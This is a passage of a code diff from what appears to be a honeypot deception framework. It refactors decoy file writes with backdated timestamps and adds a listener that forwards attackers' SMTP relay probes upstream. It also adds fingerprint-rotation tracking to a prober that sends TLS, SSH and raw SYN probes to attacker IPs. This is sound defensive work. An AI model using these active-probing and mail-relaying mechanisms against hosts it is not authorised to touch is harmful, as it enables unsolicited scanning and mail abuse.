from decnet.orchestrator.drivers.base import ActivityDriver, ActivityResult
|
from decnet.orchestrator.drivers.base import ActivityDriver, ActivityResult
|
||||||
@@ -226,36 +223,24 @@ class SSHDriver(ActivityDriver):
|
|||||||
) -> ActivityResult:
|
) -> ActivityResult:
|
||||||
"""Write *content* to *path* inside *decky_name*'s ssh container.
|
"""Write *content* to *path* inside *decky_name*'s ssh container.
|
||||||
|
|
||||||
Streams base64 via stdin (mirrors :mod:`decnet.canary.planter`'s
|
Delegates to :func:`decnet.decky_io.write_file_to_container`,
|
||||||
ARG_MAX-safe write — see commit c17b9e0). Sets file mode and,
|
which carries the ARG_MAX-safe base64-via-stdin trick. Sets
|
||||||
when *mtime* is provided, ``touch -d`` to backdate the file so
|
file mode and, when *mtime* is provided, ``touch -d`` to
|
||||||
it doesn't all stamp at wall-clock-now (the realism failure
|
backdate the file (otherwise everything stamps at wall-clock-now
|
||||||
this migration is fixing).
|
— the realism failure this path was originally fixing).
|
||||||
"""
|
"""
|
||||||
|
from decnet.decky_io import write_file_to_container
|
||||||
|
|
||||||
container = _container_for(decky_name)
|
container = _container_for(decky_name)
|
||||||
b64 = base64.b64encode(content).decode("ascii")
|
success, error = await write_file_to_container(
|
||||||
# touch -d accepts ISO 8601; we always emit UTC so the
|
container, path, content, mode=mode, mtime=mtime, timeout=_TIMEOUT,
|
||||||
# container's local TZ doesn't drift the mtime.
|
|
||||||
if mtime is not None:
|
|
||||||
ts = mtime.astimezone(timezone.utc).strftime("%Y-%m-%d %H:%M:%S UTC")
|
|
||||||
touch_cmd = f"touch -d {shlex.quote(ts)} {shlex.quote(path)}"
|
|
||||||
else:
|
|
||||||
touch_cmd = f"touch {shlex.quote(path)}"
|
|
||||||
sh_cmd = (
|
|
||||||
f"mkdir -p {shlex.quote(_dirname(path))} && "
|
|
||||||
f"base64 -d > {shlex.quote(path)} && "
|
|
||||||
f"chmod {mode:o} {shlex.quote(path)} && "
|
|
||||||
f"{touch_cmd}"
|
|
||||||
)
|
)
|
||||||
argv = [_DOCKER, "exec", "-i", container, "sh", "-c", sh_cmd]
|
|
||||||
rc, _stdout, stderr = await _run_with_stdin(argv, b64.encode("ascii"))
|
|
||||||
success = rc == 0
|
|
||||||
payload: dict[str, Any] = {
|
payload: dict[str, Any] = {
|
||||||
"dst_decky": decky_name,
|
"dst_decky": decky_name,
|
||||||
"path": path,
|
"path": path,
|
||||||
"bytes": len(content),
|
"bytes": len(content),
|
||||||
"rc": rc,
|
"rc": 0 if success else 1,
|
||||||
"stderr": stderr.strip()[:256] if not success else None,
|
"stderr": error if not success else None,
|
||||||
}
|
}
|
||||||
return ActivityResult(success=success, payload=payload)
|
return ActivityResult(success=success, payload=payload)
|
||||||
|
|
||||||
@@ -283,11 +268,3 @@ class SSHDriver(ActivityDriver):
|
|||||||
)
|
)
|
||||||
|
|
||||||
|
|
||||||
def _dirname(path: str) -> str:
|
|
||||||
"""Pure-string dirname. We can't trust ``os.path.dirname`` on the
|
|
||||||
host to share the destination container's separator semantics, but
|
|
||||||
deckies are POSIX so a plain ``rfind('/')`` suffices."""
|
|
||||||
idx = path.rfind("/")
|
|
||||||
if idx <= 0:
|
|
||||||
return "/"
|
|
||||||
return path[:idx]
|
|
||||||
|
|||||||
@@ -131,13 +131,13 @@ async def _resolve_personas(
|
|||||||
topology = await repo.get_topology(topology_id)
|
topology = await repo.get_topology(topology_id)
|
||||||
if not topology:
|
if not topology:
|
||||||
return [], source
|
return [], source
|
||||||
return (
|
if isinstance(topology, dict):
|
||||||
parse_personas(
|
raw = topology.get("email_personas")
|
||||||
topology.get("email_personas"),
|
lang = topology.get("language_default") or "en"
|
||||||
language_default=topology.get("language_default") or "en",
|
else:
|
||||||
),
|
raw = topology.email_personas
|
||||||
source,
|
lang = topology.language_default or "en"
|
||||||
)
|
return parse_personas(raw, language_default=lang), source
|
||||||
# Fleet / shard / anything else → global pool.
|
# Fleet / shard / anything else → global pool.
|
||||||
return global_pool.load(), source
|
return global_pool.load(), source
|
||||||
|
|
||||||
@@ -175,7 +175,7 @@ async def pick(
|
|||||||
)
|
)
|
||||||
return None
|
return None
|
||||||
|
|
||||||
active = [p for p in personas if in_active_hours(p, now_dt.hour)]
|
active = [p for p in personas if in_active_hours(p, now_dt)]
|
||||||
if len(active) < 2:
|
if len(active) < 2:
|
||||||
logger.debug(
|
logger.debug(
|
||||||
"emailgen pick: source=%s mail_decky=%s only %d personas in-hours",
|
"emailgen pick: source=%s mail_decky=%s only %d personas in-hours",
|
||||||
|
|||||||
@@ -311,17 +311,22 @@ async def _resolve_personas(
|
|||||||
return enriched
|
return enriched
|
||||||
|
|
||||||
|
|
||||||
def _topology_personas(topology: Optional[dict[str, Any]]) -> list[EmailPersona]:
|
def _topology_personas(topology) -> list[EmailPersona]:
|
||||||
if not topology:
|
if not topology:
|
||||||
return []
|
return []
|
||||||
raw = topology.get("email_personas")
|
if isinstance(topology, dict):
|
||||||
|
raw = topology.get("email_personas")
|
||||||
|
lang = topology.get("language_default") or "en"
|
||||||
|
else:
|
||||||
|
raw = topology.email_personas
|
||||||
|
lang = topology.language_default or "en"
|
||||||
if raw is None:
|
if raw is None:
|
||||||
return []
|
return []
|
||||||
if isinstance(raw, list):
|
if isinstance(raw, list):
|
||||||
return parse_personas(raw, language_default=topology.get("language_default") or "en")
|
return parse_personas(raw, language_default=lang)
|
||||||
if isinstance(raw, str):
|
if isinstance(raw, str):
|
||||||
try:
|
try:
|
||||||
return parse_personas(json.loads(raw), language_default=topology.get("language_default") or "en")
|
return parse_personas(json.loads(raw), language_default=lang)
|
||||||
except json.JSONDecodeError:
|
except json.JSONDecodeError:
|
||||||
return []
|
return []
|
||||||
return []
|
return []
|
||||||
|
|||||||
@@ -25,6 +25,7 @@ import secrets
|
|||||||
from datetime import datetime, timezone
|
from datetime import datetime, timezone
|
||||||
from typing import Any, Optional
|
from typing import Any, Optional
|
||||||
|
|
||||||
|
from decnet.bus import topics as _topics
|
||||||
from decnet.bus.factory import get_bus
|
from decnet.bus.factory import get_bus
|
||||||
from decnet.bus.publish import (
|
from decnet.bus.publish import (
|
||||||
publish_safely,
|
publish_safely,
|
||||||
@@ -34,6 +35,7 @@ from decnet.bus.publish import (
|
|||||||
from decnet.logging import get_logger
|
from decnet.logging import get_logger
|
||||||
from decnet.orchestrator import events, scheduler
|
from decnet.orchestrator import events, scheduler
|
||||||
from decnet.orchestrator.drivers import get_driver_for
|
from decnet.orchestrator.drivers import get_driver_for
|
||||||
|
from decnet.orchestrator.drivers.smtp_relay import forward_probe
|
||||||
from decnet.orchestrator.emailgen import (
|
from decnet.orchestrator.emailgen import (
|
||||||
events as email_events,
|
events as email_events,
|
||||||
scheduler as email_scheduler,
|
scheduler as email_scheduler,
|
||||||
@@ -127,6 +129,7 @@ async def orchestrator_worker(
|
|||||||
# operator's intent rather than the baked-in defaults. A failure
|
# operator's intent rather than the baked-in defaults. A failure
|
||||||
# here logs and falls through; the planner already holds defaults.
|
# here logs and falls through; the planner already holds defaults.
|
||||||
await _refresh_realism_config(repo)
|
await _refresh_realism_config(repo)
|
||||||
|
await _refresh_llm_config(repo)
|
||||||
|
|
||||||
shutdown = asyncio.Event()
|
shutdown = asyncio.Event()
|
||||||
heartbeat_task = asyncio.create_task(
|
heartbeat_task = asyncio.create_task(
|
||||||
@@ -138,6 +141,9 @@ async def orchestrator_worker(
|
|||||||
control_task = asyncio.create_task(
|
control_task = asyncio.create_task(
|
||||||
run_control_listener(bus, "orchestrator", shutdown),
|
run_control_listener(bus, "orchestrator", shutdown),
|
||||||
)
|
)
|
||||||
|
probe_task = asyncio.create_task(
|
||||||
|
_run_smtp_probe_listener(repo, shutdown),
|
||||||
|
)
|
||||||
tick_n = 0
|
tick_n = 0
|
||||||
try:
|
try:
|
||||||
while not shutdown.is_set():
|
while not shutdown.is_set():
|
||||||
@@ -156,8 +162,9 @@ async def orchestrator_worker(
|
|||||||
await _periodic_prune(repo)
|
await _periodic_prune(repo)
|
||||||
if tick_n % _REALISM_CONFIG_REFRESH_TICKS == 0:
|
if tick_n % _REALISM_CONFIG_REFRESH_TICKS == 0:
|
||||||
await _refresh_realism_config(repo)
|
await _refresh_realism_config(repo)
|
||||||
|
await _refresh_llm_config(repo)
|
||||||
finally:
|
finally:
|
||||||
for t in (heartbeat_task, control_task):
|
for t in (heartbeat_task, control_task, probe_task):
|
||||||
t.cancel()
|
t.cancel()
|
||||||
with contextlib.suppress(Exception, asyncio.CancelledError):
|
with contextlib.suppress(Exception, asyncio.CancelledError):
|
||||||
await t
|
await t
|
||||||
@@ -218,6 +225,18 @@ async def _refresh_realism_config(repo: BaseRepository) -> None:
|
|||||||
logger.warning("realism config refresh: rejected payload: %s", exc)
|
logger.warning("realism config refresh: rejected payload: %s", exc)
|
||||||
|
|
||||||
|
|
||||||
|
async def _refresh_llm_config(repo: BaseRepository) -> None:
|
||||||
|
"""Pull operator-tuned LLM config from realism_config into the backend cache."""
|
||||||
|
from decnet.realism.llm.config import apply, load_from_db
|
||||||
|
cfg = await load_from_db(repo)
|
||||||
|
if cfg is None:
|
||||||
|
return
|
||||||
|
try:
|
||||||
|
apply(cfg)
|
||||||
|
except Exception as exc: # noqa: BLE001
|
||||||
|
logger.warning("llm config refresh: apply failed: %s", exc)
|
||||||
|
|
||||||
|
|
||||||
def _roll_action_kind(rng: secrets.SystemRandom) -> str:
|
def _roll_action_kind(rng: secrets.SystemRandom) -> str:
|
||||||
total = sum(w for _, w in _ACTION_WEIGHTS)
|
total = sum(w for _, w in _ACTION_WEIGHTS)
|
||||||
target = rng.randint(1, total)
|
target = rng.randint(1, total)
|
||||||
@@ -303,7 +322,7 @@ async def _pick_action(
|
|||||||
)
|
)
|
||||||
elif kind == "email":
|
elif kind == "email":
|
||||||
try:
|
try:
|
||||||
action = await email_scheduler.pick(repo, rand=rng)
|
action = await email_scheduler.pick(repo, rand=rng) # type: ignore[assignment]
|
||||||
except Exception as exc: # noqa: BLE001
|
except Exception as exc: # noqa: BLE001
|
||||||
logger.debug("orchestrator: email pick failed: %s", exc)
|
logger.debug("orchestrator: email pick failed: %s", exc)
|
||||||
action = None
|
action = None
|
||||||
@@ -467,6 +486,100 @@ async def _bump_synthetic_file_after_edit(repo, action, result) -> None:
|
|||||||
await repo.update_synthetic_file(action.synthetic_file_uuid, patch)
|
await repo.update_synthetic_file(action.synthetic_file_uuid, patch)
|
||||||
|
|
||||||
|
|
||||||
|
async def _run_smtp_probe_listener(
|
||||||
|
repo: BaseRepository,
|
||||||
|
shutdown: asyncio.Event,
|
||||||
|
) -> None:
|
||||||
|
"""Subscribe to smtp.probe.pending and forward probe emails upstream.
|
||||||
|
|
||||||
|
Runs as a long-lived subtask alongside the tick loop. When a probe lands
|
||||||
|
we check if this (attacker_ip, decky) has already been forwarded up to
|
||||||
|
probe_limit times — if not, forward via the master's real internet
|
||||||
|
connection and store a probe_relay bounty with the result.
|
||||||
|
"""
|
||||||
|
try:
|
||||||
|
bus = get_bus(client_name="orchestrator-probe")
|
||||||
|
await bus.connect()
|
||||||
|
sub = bus.subscribe(_topics.smtp("probe.pending"))
|
||||||
|
async with sub:
|
||||||
|
async for event in sub:
|
||||||
|
if shutdown.is_set():
|
||||||
|
break
|
||||||
|
try:
|
||||||
|
await _handle_probe_pending(repo, event.payload)
|
||||||
|
except Exception as exc: # noqa: BLE001
|
||||||
|
logger.warning("smtp probe listener: handle error: %s", exc)
|
||||||
|
except asyncio.CancelledError:
|
||||||
|
raise
|
||||||
|
except Exception as exc: # noqa: BLE001
|
||||||
|
logger.warning("smtp probe listener: bus unavailable: %s", exc)
|
||||||
|
finally:
|
||||||
|
with contextlib.suppress(Exception):
|
||||||
|
await bus.close()
|
||||||
|
|
||||||
|
|
||||||
|
async def _handle_probe_pending(repo: BaseRepository, payload: dict) -> None:
|
||||||
|
decky_name = (payload.get("decky") or "").strip()
|
||||||
|
attacker_ip = (payload.get("attacker_ip") or "").strip()
|
||||||
|
stored_as = (payload.get("stored_as") or "").strip()
|
||||||
|
mail_from = (payload.get("mail_from") or "").strip()
|
||||||
|
rcpt_to_raw = (payload.get("rcpt_to") or "").strip()
|
||||||
|
|
||||||
|
if not (decky_name and attacker_ip and stored_as):
|
||||||
|
return
|
||||||
|
|
||||||
|
decky_row = await repo.get_fleet_decky_by_name(decky_name)
|
||||||
|
if not decky_row:
|
||||||
|
return
|
||||||
|
svc_cfg = (
|
||||||
|
(decky_row.get("decky_config") or {})
|
||||||
|
.get("service_config", {})
|
||||||
|
.get("smtp_relay") or {}
|
||||||
|
)
|
||||||
|
if not (svc_cfg.get("upstream_host") or "").strip():
|
||||||
|
return
|
||||||
|
|
||||||
|
probe_limit = int(svc_cfg.get("probe_limit") or 1)
|
||||||
|
already_sent = await repo.count_probe_relays(attacker_ip, decky_name)
|
||||||
|
if already_sent >= probe_limit:
|
||||||
|
return
|
||||||
|
|
||||||
|
rcpt_to = [r.strip() for r in rcpt_to_raw.split(",") if r.strip()]
|
||||||
|
artifacts_root = os.environ.get("DECNET_ARTIFACTS_ROOT", "/var/lib/decnet/artifacts")
|
||||||
|
|
||||||
|
loop = asyncio.get_event_loop()
|
||||||
|
ok, reason = await loop.run_in_executor(
|
||||||
|
None,
|
||||||
|
lambda: forward_probe(
|
||||||
|
svc_cfg=svc_cfg,
|
||||||
|
stored_as=stored_as,
|
||||||
|
decky_name=decky_name,
|
||||||
|
mail_from=mail_from,
|
||||||
|
rcpt_to=rcpt_to,
|
||||||
|
artifacts_root=artifacts_root,
|
||||||
|
),
|
||||||
|
)
|
||||||
|
|
||||||
|
await repo.add_bounty({
|
||||||
|
"decky": decky_name,
|
||||||
|
"service": "smtp_relay",
|
||||||
|
"attacker_ip": attacker_ip,
|
||||||
|
"bounty_type": "probe_relay",
|
||||||
|
"payload": {
|
||||||
|
"stored_as": stored_as,
|
||||||
|
"forwarded": ok,
|
||||||
|
**({"fwd_error": reason} if not ok else {}),
|
||||||
|
},
|
||||||
|
})
|
||||||
|
if ok:
|
||||||
|
logger.info("smtp probe forwarded decky=%s ip=%s", decky_name, attacker_ip)
|
||||||
|
else:
|
||||||
|
logger.warning(
|
||||||
|
"smtp probe forward failed decky=%s ip=%s error=%s",
|
||||||
|
decky_name, attacker_ip, reason,
|
||||||
|
)
|
||||||
|
|
||||||
|
|
||||||
async def _record_synthetic_file(repo, action) -> None:
|
async def _record_synthetic_file(repo, action) -> None:
|
||||||
"""Persist (or patch) a synthetic_files row after a FileAction plant.
|
"""Persist (or patch) a synthetic_files row after a FileAction plant.
|
||||||
|
|
||||||
|
|||||||
@@ -48,7 +48,7 @@ def _send_syn(
|
|||||||
Craft a TCP SYN with common options and send it. Returns the
|
Craft a TCP SYN with common options and send it. Returns the
|
||||||
SYN-ACK response packet or None on timeout/failure.
|
SYN-ACK response packet or None on timeout/failure.
|
||||||
"""
|
"""
|
||||||
from scapy.all import IP, TCP, conf, sr1
|
from scapy.all import IP, TCP, conf, sr1 # type: ignore[attr-defined]
|
||||||
|
|
||||||
# Suppress scapy's noisy output
|
# Suppress scapy's noisy output
|
||||||
conf.verb = 0
|
conf.verb = 0
|
||||||
@@ -83,7 +83,7 @@ def _send_syn(
|
|||||||
return None
|
return None
|
||||||
|
|
||||||
# Verify it's a SYN-ACK (flags == 0x12)
|
# Verify it's a SYN-ACK (flags == 0x12)
|
||||||
from scapy.all import TCP as TCPLayer
|
from scapy.all import TCP as TCPLayer # type: ignore[attr-defined]
|
||||||
if not resp.haslayer(TCPLayer):
|
if not resp.haslayer(TCPLayer):
|
||||||
return None
|
return None
|
||||||
if resp[TCPLayer].flags != 0x12: # SYN-ACK
|
if resp[TCPLayer].flags != 0x12: # SYN-ACK
|
||||||
@@ -103,7 +103,7 @@ def _send_rst(
|
|||||||
) -> None:
|
) -> None:
|
||||||
"""Send RST to clean up the half-open connection."""
|
"""Send RST to clean up the half-open connection."""
|
||||||
try:
|
try:
|
||||||
from scapy.all import IP, TCP, send
|
from scapy.all import IP, TCP, send # type: ignore[attr-defined]
|
||||||
rst = (
|
rst = (
|
||||||
IP(dst=host)
|
IP(dst=host)
|
||||||
/ TCP(
|
/ TCP(
|
||||||
@@ -124,7 +124,7 @@ def _parse_synack(resp: Any) -> dict[str, Any]:
|
|||||||
"""
|
"""
|
||||||
Extract fingerprint fields from a scapy SYN-ACK response packet.
|
Extract fingerprint fields from a scapy SYN-ACK response packet.
|
||||||
"""
|
"""
|
||||||
from scapy.all import IP, TCP
|
from scapy.all import IP, TCP # type: ignore[attr-defined]
|
||||||
|
|
||||||
ip_layer = resp[IP]
|
ip_layer = resp[IP]
|
||||||
tcp_layer = resp[TCP]
|
tcp_layer = resp[TCP]
|
||||||
|
|||||||
@@ -27,6 +27,9 @@ from datetime import datetime, timezone
|
|||||||
from pathlib import Path
|
from pathlib import Path
|
||||||
from typing import Any, Callable
|
from typing import Any, Callable
|
||||||
|
|
||||||
|
from sqlalchemy.engine import Engine
|
||||||
|
from sqlmodel import Session
|
||||||
|
|
||||||
from decnet.bus import topics as _topics
|
from decnet.bus import topics as _topics
|
||||||
from decnet.bus.base import BaseBus
|
from decnet.bus.base import BaseBus
|
||||||
from decnet.bus.factory import get_bus
|
from decnet.bus.factory import get_bus
|
||||||
@@ -35,6 +38,10 @@ from decnet.bus.publish import (
|
|||||||
run_control_listener,
|
run_control_listener,
|
||||||
run_health_heartbeat,
|
run_health_heartbeat,
|
||||||
)
|
)
|
||||||
|
from decnet.correlation.fingerprint_rotation import (
|
||||||
|
ProbeType,
|
||||||
|
record_fingerprint,
|
||||||
|
)
|
||||||
from decnet.logging import get_logger
|
from decnet.logging import get_logger
|
||||||
from decnet.prober.hassh import hassh_server
|
from decnet.prober.hassh import hassh_server
|
||||||
from decnet.prober.jarm import JARM_EMPTY_HASH, jarm_hash
|
from decnet.prober.jarm import JARM_EMPTY_HASH, jarm_hash
|
||||||
@@ -44,6 +51,21 @@ from decnet.telemetry import traced as _traced
|
|||||||
|
|
||||||
logger = get_logger("prober")
|
logger = get_logger("prober")
|
||||||
|
|
||||||
|
|
||||||
|
def _build_sync_engine() -> Engine:
|
||||||
|
"""Construct a sync SQLite engine for rotation-detection state.
|
||||||
|
|
||||||
|
Used inline by the prober; it lives outside the async repository
|
||||||
|
layer because rotation detection is a sync hook on a sync probe
|
||||||
|
path. Honors the same defaulting as
|
||||||
|
``decnet.web.db.sqlite.repository.SQLiteRepository``.
|
||||||
|
"""
|
||||||
|
import os
|
||||||
|
from decnet.config import _ROOT
|
||||||
|
from decnet.web.db.sqlite.database import get_sync_engine
|
||||||
|
db_path = os.environ.get("DECNET_DB_PATH", str(_ROOT / "decnet.db"))
|
||||||
|
return get_sync_engine(db_path)
|
||||||
|
|
||||||
# ─── Default ports per probe type ───────────────────────────────────────────
|
# ─── Default ports per probe type ───────────────────────────────────────────
|
||||||
|
|
||||||
# JARM: common C2 callback / TLS server ports
|
# JARM: common C2 callback / TLS server ports
|
||||||
@@ -233,6 +255,14 @@ def _discover_attackers(json_path: Path, position: int) -> tuple[set[str], int]:
|
|||||||
|
|
||||||
ProbePublishFn = Callable[[str, dict[str, Any]], None]
|
ProbePublishFn = Callable[[str, dict[str, Any]], None]
|
||||||
|
|
||||||
|
# Rotation recorder: takes (attacker_ip, port, probe_type, new_hash) and
|
||||||
|
# performs the rotation-detection upsert + derived-event emission for the
|
||||||
|
# DEBT-032 substrate-fingerprint flow. Optional; when None the prober
|
||||||
|
# behaves exactly as before (raw fingerprint emit only, no rotation
|
||||||
|
# detection). Construction lives at worker startup so phase functions
|
||||||
|
# don't have to know about the DB engine.
|
||||||
|
RotationRecorderFn = Callable[[str, int, "ProbeType", str], None]
|
||||||
|
|
||||||
|
|
||||||
@_traced("prober.probe_cycle")
|
@_traced("prober.probe_cycle")
|
||||||
def _probe_cycle(
|
def _probe_cycle(
|
||||||
@@ -245,6 +275,7 @@ def _probe_cycle(
|
|||||||
json_path: Path,
|
json_path: Path,
|
||||||
timeout: float = 5.0,
|
timeout: float = 5.0,
|
||||||
publish_fn: ProbePublishFn | None = None,
|
publish_fn: ProbePublishFn | None = None,
|
||||||
|
record_rotation: RotationRecorderFn | None = None,
|
||||||
) -> None:
|
) -> None:
|
||||||
"""
|
"""
|
||||||
Probe all known attacker IPs with JARM, HASSH, and TCP/IP fingerprinting.
|
Probe all known attacker IPs with JARM, HASSH, and TCP/IP fingerprinting.
|
||||||
@@ -263,13 +294,13 @@ def _probe_cycle(
|
|||||||
ip_probed = probed.setdefault(ip, {})
|
ip_probed = probed.setdefault(ip, {})
|
||||||
|
|
||||||
# Phase 1: JARM (TLS fingerprinting)
|
# Phase 1: JARM (TLS fingerprinting)
|
||||||
_jarm_phase(ip, ip_probed, jarm_ports, log_path, json_path, timeout, publish_fn)
|
_jarm_phase(ip, ip_probed, jarm_ports, log_path, json_path, timeout, publish_fn, record_rotation)
|
||||||
|
|
||||||
# Phase 2: HASSHServer (SSH fingerprinting)
|
# Phase 2: HASSHServer (SSH fingerprinting)
|
||||||
_hassh_phase(ip, ip_probed, ssh_ports, log_path, json_path, timeout, publish_fn)
|
_hassh_phase(ip, ip_probed, ssh_ports, log_path, json_path, timeout, publish_fn, record_rotation)
|
||||||
|
|
||||||
# Phase 3: TCP/IP stack fingerprinting
|
# Phase 3: TCP/IP stack fingerprinting
|
||||||
_tcpfp_phase(ip, ip_probed, tcpfp_ports, log_path, json_path, timeout, publish_fn)
|
_tcpfp_phase(ip, ip_probed, tcpfp_ports, log_path, json_path, timeout, publish_fn, record_rotation)
|
||||||
|
|
||||||
|
|
||||||
@_traced("prober.jarm_phase")
|
@_traced("prober.jarm_phase")
|
||||||
@@ -281,6 +312,7 @@ def _jarm_phase(
|
|||||||
json_path: Path,
|
json_path: Path,
|
||||||
timeout: float,
|
timeout: float,
|
||||||
publish_fn: ProbePublishFn | None = None,
|
publish_fn: ProbePublishFn | None = None,
|
||||||
|
record_rotation: RotationRecorderFn | None = None,
|
||||||
) -> None:
|
) -> None:
|
||||||
"""JARM-fingerprint an IP on the given TLS ports."""
|
"""JARM-fingerprint an IP on the given TLS ports."""
|
||||||
done = ip_probed.setdefault("jarm", set())
|
done = ip_probed.setdefault("jarm", set())
|
||||||
@@ -301,6 +333,8 @@ def _jarm_phase(
|
|||||||
msg=f"JARM {ip}:{port} = {h}",
|
msg=f"JARM {ip}:{port} = {h}",
|
||||||
)
|
)
|
||||||
logger.info("prober: JARM %s:%d = %s", ip, port, h)
|
logger.info("prober: JARM %s:%d = %s", ip, port, h)
|
||||||
|
if record_rotation is not None:
|
||||||
|
record_rotation(ip, port, "jarm", h)
|
||||||
if publish_fn is not None:
|
if publish_fn is not None:
|
||||||
publish_fn(
|
publish_fn(
|
||||||
"jarm",
|
"jarm",
|
||||||
@@ -387,6 +421,7 @@ def _hassh_phase(
|
|||||||
json_path: Path,
|
json_path: Path,
|
||||||
timeout: float,
|
timeout: float,
|
||||||
publish_fn: ProbePublishFn | None = None,
|
publish_fn: ProbePublishFn | None = None,
|
||||||
|
record_rotation: RotationRecorderFn | None = None,
|
||||||
) -> None:
|
) -> None:
|
||||||
"""HASSHServer-fingerprint an IP on the given SSH ports."""
|
"""HASSHServer-fingerprint an IP on the given SSH ports."""
|
||||||
done = ip_probed.setdefault("hassh", set())
|
done = ip_probed.setdefault("hassh", set())
|
||||||
@@ -412,6 +447,8 @@ def _hassh_phase(
|
|||||||
msg=f"HASSH {ip}:{port} = {result['hassh_server']}",
|
msg=f"HASSH {ip}:{port} = {result['hassh_server']}",
|
||||||
)
|
)
|
||||||
logger.info("prober: HASSH %s:%d = %s", ip, port, result["hassh_server"])
|
logger.info("prober: HASSH %s:%d = %s", ip, port, result["hassh_server"])
|
||||||
|
if record_rotation is not None:
|
||||||
|
record_rotation(ip, port, "hassh", result["hassh_server"])
|
||||||
if publish_fn is not None:
|
if publish_fn is not None:
|
||||||
publish_fn(
|
publish_fn(
|
||||||
"hassh",
|
"hassh",
|
||||||
@@ -445,6 +482,7 @@ def _tcpfp_phase(
|
|||||||
json_path: Path,
|
json_path: Path,
|
||||||
timeout: float,
|
timeout: float,
|
||||||
publish_fn: ProbePublishFn | None = None,
|
publish_fn: ProbePublishFn | None = None,
|
||||||
|
record_rotation: RotationRecorderFn | None = None,
|
||||||
) -> None:
|
) -> None:
|
||||||
"""TCP/IP stack fingerprint an IP on the given ports."""
|
"""TCP/IP stack fingerprint an IP on the given ports."""
|
||||||
done = ip_probed.setdefault("tcpfp", set())
|
done = ip_probed.setdefault("tcpfp", set())
|
||||||
@@ -478,6 +516,8 @@ def _tcpfp_phase(
|
|||||||
msg=f"TCPFP {ip}:{port} = {result['tcpfp_hash']}",
|
msg=f"TCPFP {ip}:{port} = {result['tcpfp_hash']}",
|
||||||
)
|
)
|
||||||
logger.info("prober: TCPFP %s:%d = %s", ip, port, result["tcpfp_hash"])
|
logger.info("prober: TCPFP %s:%d = %s", ip, port, result["tcpfp_hash"])
|
||||||
|
if record_rotation is not None:
|
||||||
|
record_rotation(ip, port, "tcpfp", result["tcpfp_hash"])
|
||||||
if publish_fn is not None:
|
if publish_fn is not None:
|
||||||
publish_fn(
|
publish_fn(
|
||||||
"tcpfp",
|
"tcpfp",
|
||||||
@@ -586,6 +626,61 @@ async def prober_worker(
|
|||||||
event_type,
|
event_type,
|
||||||
)
|
)
|
||||||
|
|
||||||
|
# Substrate-rotation detection (DEBT-032) — open a sync engine for
|
||||||
|
# the prober's lifetime; recorder closes a session per call so we
|
||||||
|
# never hold a connection across phase boundaries. Failure to
|
||||||
|
# connect is non-fatal: probes continue, rotation detection is
|
||||||
|
# silently disabled.
|
||||||
|
rotation_engine: Engine | None = None
|
||||||
|
record_rotation: RotationRecorderFn | None = None
|
||||||
|
try:
|
||||||
|
rotation_engine = _build_sync_engine()
|
||||||
|
except Exception as exc: # noqa: BLE001
|
||||||
|
logger.warning(
|
||||||
|
"prober: rotation-detection DB unavailable, "
|
||||||
|
"running with rotation detection disabled: %s", exc,
|
||||||
|
)
|
||||||
|
|
||||||
|
if rotation_engine is not None:
|
||||||
|
def _publish_rotation(event_type: str, payload: dict[str, Any]) -> None:
|
||||||
|
raw_publish(
|
||||||
|
_topics.attacker(_topics.ATTACKER_FINGERPRINT_ROTATED),
|
||||||
|
payload,
|
||||||
|
event_type,
|
||||||
|
)
|
||||||
|
|
||||||
|
def _syslog_rotation(event_type: str, payload: dict[str, Any]) -> None:
|
||||||
|
_write_event(
|
||||||
|
log_path, json_path,
|
||||||
|
"fingerprint_rotated",
|
||||||
|
target_ip=payload["attacker_ip"],
|
||||||
|
target_port=str(payload["port"]),
|
||||||
|
probe_type=payload["probe_type"],
|
||||||
|
old_hash=payload.get("old_hash") or "",
|
||||||
|
new_hash=payload["new_hash"],
|
||||||
|
rotation_count=str(payload["rotation_count"]),
|
||||||
|
msg=(
|
||||||
|
f"FP rotation {payload['attacker_ip']}:{payload['port']} "
|
||||||
|
f"{payload['probe_type']} {payload.get('old_hash')} → "
|
||||||
|
f"{payload['new_hash']}"
|
||||||
|
),
|
||||||
|
)
|
||||||
|
|
||||||
|
def record_rotation(
|
||||||
|
ip: str, port: int, probe_type: ProbeType, new_hash: str,
|
||||||
|
) -> None:
|
||||||
|
with Session(rotation_engine) as session:
|
||||||
|
record_fingerprint(
|
||||||
|
session,
|
||||||
|
attacker_ip=ip,
|
||||||
|
port=port,
|
||||||
|
probe_type=probe_type,
|
||||||
|
new_hash=new_hash,
|
||||||
|
ts=datetime.now(timezone.utc),
|
||||||
|
publish_fn=_publish_rotation,
|
||||||
|
syslog_fn=_syslog_rotation,
|
||||||
|
)
|
||||||
|
|
||||||
shutdown = asyncio.Event()
|
shutdown = asyncio.Event()
|
||||||
heartbeat_task = asyncio.create_task(run_health_heartbeat(bus, "prober"))
|
heartbeat_task = asyncio.create_task(run_health_heartbeat(bus, "prober"))
|
||||||
control_task = asyncio.create_task(
|
control_task = asyncio.create_task(
|
||||||
@@ -612,6 +707,7 @@ async def prober_worker(
|
|||||||
jarm_ports, hassh_ports, tcp_ports,
|
jarm_ports, hassh_ports, tcp_ports,
|
||||||
log_path, json_path, timeout,
|
log_path, json_path, timeout,
|
||||||
_publish_attacker,
|
_publish_attacker,
|
||||||
|
record_rotation,
|
||||||
)
|
)
|
||||||
|
|
||||||
try:
|
try:
|
||||||
@@ -626,3 +722,6 @@ async def prober_worker(
|
|||||||
if bus is not None:
|
if bus is not None:
|
||||||
with contextlib.suppress(Exception):
|
with contextlib.suppress(Exception):
|
||||||
await bus.close()
|
await bus.close()
|
||||||
|
if rotation_engine is not None:
|
||||||
|
with contextlib.suppress(Exception):
|
||||||
|
rotation_engine.dispose()
|
||||||
|
|||||||
25
decnet/profiler/behave_shell/__init__.py
Normal file
25
decnet/profiler/behave_shell/__init__.py
Normal file
@@ -0,0 +1,25 @@
|
|||||||
|
"""BEHAVE-SHELL extraction engine — DECNET's official implementation.
|
||||||
|
|
||||||
|
Per ``development/BEHAVE-EXTRACTOR.md``: this package is a pure
|
||||||
|
library. Workers (``BEHAVE-INTEGRATION.md`` Phase 4) own I/O, bus
|
||||||
|
emission, and persistence. The engine just turns one PTY session into
|
||||||
|
``Iterable[Observation]``.
|
||||||
|
|
||||||
|
BEHAVE is the spec; DECNET is the engine.
|
||||||
|
"""
|
||||||
|
from __future__ import annotations
|
||||||
|
|
||||||
|
from decnet.profiler.behave_shell.extract import (
|
||||||
|
DEFAULT_SOURCE,
|
||||||
|
build_context,
|
||||||
|
extract_session,
|
||||||
|
)
|
||||||
|
|
||||||
|
# Phase H.5-pre: extractor is feature-complete (37/37 Tier-A primitives
|
||||||
|
